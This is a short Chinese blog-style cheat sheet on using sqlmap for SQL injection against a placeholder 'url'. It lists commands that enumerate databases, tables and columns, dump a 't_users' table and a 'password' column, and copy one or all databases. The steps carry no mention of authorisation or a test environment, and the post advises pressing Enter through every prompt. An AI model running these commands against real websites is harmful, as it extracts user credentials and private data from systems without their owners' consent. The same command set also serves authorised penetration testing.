sqlmap注入检测

1、列出可利用数据库:

sqlmap  -u  url  --dbs

sqlmap注入检测

2、列出某个数据库中表:

sqlmap  -u  url   --tables  -D  south

sqlmap注入检测

sqlmap  -u  url  --dump   -T   t_users   -D   south

sqlmap注入检测

3、列出某个数据库中某个表的字段:

sqlmap  -u  url   --columns  -T  member  -D  south

sqlmap注入检测

4、列出某个数据库中某个表的某个字段:

sqlmap  -u  url   --dump  -C  id  -T  member  -D  south

sqlmap注入检测

sqlmap  -u  url   --dump  -C  password  -T  member  -D  south

sqlmap注入检测

5、复制某个数据库:

sqlmap  -u  url   --dump  –D  south

sqlmap注入检测

sqlmap注入检测

遇到问题,一路回车

6、复制全部数据库:

sqlmap   -u  url   --dump-all

与5同理

遇到问题,一路回车

PS:-D:数据库,-T:数据库中表,-C:数据库中表的字段,--dump:复制

上一篇:避免string.Format方法的装箱


下一篇:扩大View的点击范围